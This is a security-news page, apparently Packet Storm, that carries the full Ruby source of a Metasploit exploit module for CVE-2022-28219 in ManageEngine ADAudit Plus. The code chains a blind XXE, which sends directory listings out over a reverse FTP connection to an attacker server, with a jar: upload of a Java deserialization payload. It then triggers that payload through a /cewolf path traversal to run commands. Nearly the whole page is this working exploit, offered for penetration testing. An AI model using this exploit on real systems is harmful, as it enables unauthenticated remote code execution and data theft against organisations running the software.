Security
Headlines
HeadlinesLatestCVEs

Headline

ManageEngine ADAudit Plus Path Traversal / XML Injection

This Metasploit module exploits CVE-2022-28219, which is a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060. They include a path traversal in the /cewolf endpoint along with a blind XML external entity injection vulnerability to upload and execute a file.

Packet Storm
#vulnerability#web#windows#microsoft#js#git#java#perl#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::TcpServer  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  include Msf::Handler::Reverse::Comm  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ManageEngine ADAudit Plus CVE-2022-28219',        'Description' => %q{          This module exploits CVE-2022-28219, which is a pair of          vulnerabilities in ManageEngine ADAudit Plus versions before build          7060: a path traversal in the /cewolf endpoint, and a blind XXE in,          to upload and execute an executable file.        },        'Author' => [          'Naveen Sunkavally', # Initial PoC + disclosure          'Ron Bowes', # Analysis and module        ],        'References' => [          ['CVE', '2022-28219'],          ['URL', 'https://www.horizon3.ai/red-team-blog-cve-2022-28219/'],          ['URL', 'https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis'],          ['URL', 'https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html'],        ],        'DisclosureDate' => '2022-06-29',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ],        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8081        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI_DESERIALIZATION', [true, 'Path traversal and unsafe deserialization endpoint', '/cewolf/logo.png']),      OptString.new('TARGETURI_XXE', [true, 'XXE endpoint', '/api/agent/tabs/agentData']),      OptString.new('DOMAIN', [true, 'Active Directory domain that the target monitors', nil]),      OptInt.new('SRVPORT_FTP', [true, 'Port for FTP reverse connection', 2121]),      OptInt.new('SRVPORT_HTTP2', [true, 'Port for additional HTTP reverse connections', 8888]),    ])    register_advanced_options([      OptInt.new('PATH_TRAVERSAL_DEPTH', [true, 'The number of `../` to prepend to the path traversal attempt', 20]),      OptInt.new('FtpCallbackTimeout', [true, 'The amount of time, in seconds, the FTP server will wait for a reverse connection', 5]),      OptInt.new('HttpUploadTimeout', [true, 'The amount of time, in seconds, the HTTP file-upload server will wait for a reverse connection', 5]),    ])  end  def srv_host    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))      return datastore['URIHOST'] || Rex::Socket.source_address(rhost)    end    return datastore['SRVHOST']  end  def check    # Make sure it's ADAudit Plus by requesting the root and checking the title    res1 = send_request_cgi(      'method' => 'GET',      'uri' => '/'    )    unless res1      return CheckCode::Unknown('Target failed to respond to check.')    end    unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)      return CheckCode::Safe('Does not appear to be ADAudit Plus')    end    # Check if it's a vulnerable version (the patch removes the /cewolf endpoint    # entirely)    res2 = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri("#{datastore['TARGETURI_DESERIALIZATION']}?img=abc")    )    unless res2      return CheckCode::Unknown('Target failed to respond to check.')    end    unless res2.code == 200      return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')    end    CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')  end  def exploit    # List the /users folder - this is good to do first, since we can fail early    # if something isn't working    vprint_status('Attempting to exploit XXE to get a list of users')    users = get_directory_listing('/users')    unless users      fail_with(Failure::NotVulnerable, 'Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)')    end    # Remove common users    users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']    if users.empty?      fail_with(Failure::NotFound, 'Failed to find any non-default user accounts')    end    print_status("User accounts discovered: #{users.join(', ')}")    # I can't figure out how to properly encode spaces, but using the 8.3    # version works! This converts them    users.map do |u|      if u.include?(' ')        u = u.gsub(/ /, '')[0..6].upcase + '~1'      end      u    end    # Check the filesystem for existing payloads that we should ignore    vprint_status('Enumerating old payloads cached on the server (to skip later)')    existing_payloads = search_for_payloads(users)    # Create a serialized payload    begin      # Create a queue so we can detect when the payload is delivered      queue = Queue.new      # Upload payload to remote server      # (this spawns a thread we need to clean up)      print_status('Attempting to exploit XXE to store our serialized payload on the server')      t = upload_payload(generate_java_deserialization_for_payload('CommonsBeanutils1', payload), queue)      # Wait for something to arrive in the queue (basically using it as a      # semaphor      vprint_status('Waiting for the payload to be sent to the target')      queue.pop # We don't need the result      # Get a list of possible payloads (never returns nil)      vprint_status("Trying to find our payload in all users' temp folders")      possible_payloads = search_for_payloads(users)      possible_payloads -= existing_payloads      # Make sure the payload exists      if possible_payloads.empty?        fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')      end      # If multiple payloads appeared, abort for safety      if possible_payloads.length > 1        fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")      end      # Execute the one payload      payload_path = possible_payloads.pop      print_status("Triggering payload: #{payload_path}...")      res = send_request_cgi(        'method' => 'GET',        'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=#{'/..' * datastore['PATH_TRAVERSAL_DEPTH']}#{payload_path}"      )      if res&.code != 200        fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res&.code}")      end    ensure      # Kill the upload thread      if t        begin          t.kill        rescue StandardError          # Do nothing if we fail to kill the thread        end      end    end  end  def get_directory_listing(folder)    print_status("Getting directory listing for #{folder} via XXE and FTP")    # Generate a unique callback URL    path = "/#{rand_text_alpha(rand(8..15))}.dtd"    full_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{path}"    # Send the username anonymous and no password so the server doesn't log in    # with the password "Java1.8.0_51@" which is detectable    # We use `end_tag` at the end so we can detect when the listing is over    end_tag = rand_text_alpha(rand(8..15))    ftp_url = "ftp://anonymous:password@#{srv_host}:#{datastore['SRVPORT_FTP']}/%file;#{end_tag}"    serve_http_file(path, "<!ENTITY % all \"<!ENTITY send SYSTEM '#{ftp_url}'>\"> %all;")    # Start a server to handle the reverse FTP connection    ftp_server = Rex::Socket::TcpServer.create(      'LocalPort' => datastore['SRVPORT_FTP'],      'LocalHost' => datastore['SRVHOST'],      'Comm' => select_comm,      'Context' => {        'Msf' => framework,        'MsfExploit' => self      }    )    # Trigger the XXE to get file listings    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,      'ctype' => 'application/json',      'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % start \"<![CDATA[\"><!ENTITY % end \"]]>\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")    )    if res&.code != 200      fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res&.code}")    end    ftp_client = nil    begin      # Wait for a connection with a timeout      select_result = ::IO.select([ftp_server], nil, nil, datastore['FtpCallbackTimeout'])      unless select_result && !select_result.empty?        print_warning("FTP reverse connection for directory enumeration failed - #{ftp_url}")        return nil      end      # Accept the connection      ftp_client = ftp_server.accept      # Print a standard banner      ftp_client.print("220 Microsoft FTP Service\r\n")      # We need to flip this so we can get a directory listing over multiple packets      directory_listing = nil      loop do        select_result = ::IO.select([ftp_client], nil, nil, datastore['FtpCallbackTimeout'])        # Check if we ran out of data        if !select_result || select_result.empty?          # If we got nothing, we're sad          if directory_listing.nil? || directory_listing.empty?            print_warning('Did not receive data from our reverse FTP connection')            return nil          end          # If we have data, we're happy and can break          break        end        # Receive the data that's waiting        data = ftp_client.recv(256)        if data.empty?          # If we got nothing, we're done receiving          break        end        # Match behavior with ftp://test.rebex.net        if data =~ /^USER ([a-zA-Z0-9_.-]*)/          ftp_client.print("331 Password required for #{Regexp.last_match(1)}.\r\n")        elsif data =~ /^PASS /          ftp_client.print("230 User logged in.\r\n")        elsif data =~ /^TYPE ([a-zA-Z0-9_.-]*)/          ftp_client.print("200 Type set to #{Regexp.last_match(1)}.\r\n")        elsif data =~ /^EPSV ALL/          ftp_client.print("200 ESPV command successful.\r\n")        elsif data =~ /^EPSV/ # (no space)          ftp_client.print("229 Entering Extended Passive Mode(|||#{rand(1025..1100)})\r\n")        elsif data =~ /^RETR (.*)/m          # Store the start of the listing          directory_listing = Regexp.last_match(1)        else          # Have we started receiving data?          # (Disable Rubocop, because I think it's way more confusing to          # continue the elsif train)          if directory_listing.nil? # rubocop:disable Style/IfInsideElse            # We shouldn't really get here, but if we do, just play dumb and            # keep the client talking            ftp_client.print("230 User logged in.\r\n")          else            # If we're receiving data, just append            directory_listing.concat(data)          end        end        # Break when we get the PORT command (this is faster than timing out,        # but doesn't always seem to work)        if !directory_listing.nil? && directory_listing =~ /(.*)#{end_tag}/m          directory_listing = Regexp.last_match(1)          break        end      end    ensure      ftp_server.close      if ftp_client        ftp_client.close      end    end    # Handle FTP errors (which thankfully aren't as common as they used to be)    unless ftp_client      print_warning("Didn't receive expected FTP connection")      return nil    end    if directory_listing.nil? || directory_listing.empty?      vprint_warning('FTP client connected, but we did not receive any data over the socket')      return nil    end    # Remove PORT commands, split at \r\n or \n, and remove empty elements    directory_listing.gsub(/PORT [0-9,]+[\r\n]/m, '').split(/\r?\n/).reject(&:empty?)  end  def search_for_payloads(users)    return users.flat_map do |u|      dir = "/users/#{u}/appdata/local/temp"      # This will search for the payload, but right now just print stuff      listing = get_directory_listing(dir)      unless listing        vprint_warning("Couldn't get directory listing for #{dir}")        next []      end      listing           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }           .map { |f| File.join(dir, f) }    end  end  def upload_payload(payload, queue)    t = framework.threads.spawn('adaudit-payload-deliverer', false) do      c = nil      begin        # We use a TCP socket here so we can hold the socket open after the HTTP        # conversation has concluded. That way, the server caches the file in        # the user's temp folder while it waits for more data        http_server = Rex::Socket::TcpServer.create(          'LocalPort' => datastore['SRVPORT_HTTP2'],          'LocalHost' => srv_host,          'Comm' => select_comm,          'Context' => {            'Msf' => framework,            'MsfExploit' => self          }        )        # Wait for the reverse connection, with a timeout        select_result = ::IO.select([http_server], nil, nil, datastore['HttpUploadTimeout'])        unless select_result && !select_result.empty?          fail_with(Failure::Unknown, "XXE request to upload file did not receive a reverse connection on #{datastore['SRVPORT_HTTP2']}")        end        # Receive and discard the HTTP request        c = http_server.accept        c.recv(1024)        c.print "HTTP/1.1 200 OK\r\n"        c.print "Connection: keep-alive\r\n"        c.print "\r\n"        c.print payload        # This will notify the other thread that something has arrived        queue.push(true)        # This has to stay open as long as it takes to enumerate all users'        # directories to find then execute the payload. ~5 seconds works on        # a single-user system, but I increased this a lot for production.        # (This thread should be killed when the exploit completes in any case)        Rex.sleep(60)      ensure        http_server.close        if c          c.close        end      end    end    # Trigger the XXE to get file listings    path = "/#{rand_text_alpha(rand(8..15))}.jar!/file.txt"    full_url = "http://#{srv_host}:#{datastore['SRVPORT_HTTP2']}#{path}"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,      'ctype' => 'application/json',      'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")    )    if res&.code != 200      fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res&.code}")    end    return t  end  def serve_http_file(path, respond_with = '')    # do not use SSL for the attacking web server    if datastore['SSL']      ssl_restore = true      datastore['SSL'] = false    end    start_service({      'Uri' => {        'Proc' => proc do |cli, _req|          send_response(cli, respond_with)        end,        'Path' => path      }    })    datastore['SSL'] = true if ssl_restore  end  def create_json_request(xml_payload)    [      {        'DomainName' => datastore['domain'],        'EventCode' => 4688,        'EventType' => 0,        'TimeGenerated' => 0,        'Task Content' => xml_payload      }    ].to_json  endend

Related news

Critical ManageEngine ADAudit Plus Vulnerability Allows Network Takeover, Mass Data Exfiltration

An unauthenticated remote code execution vulnerability found in Zoho’s compliance tool could leave organizations exposed to an information disclosure catastrophe, new analysis shows.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution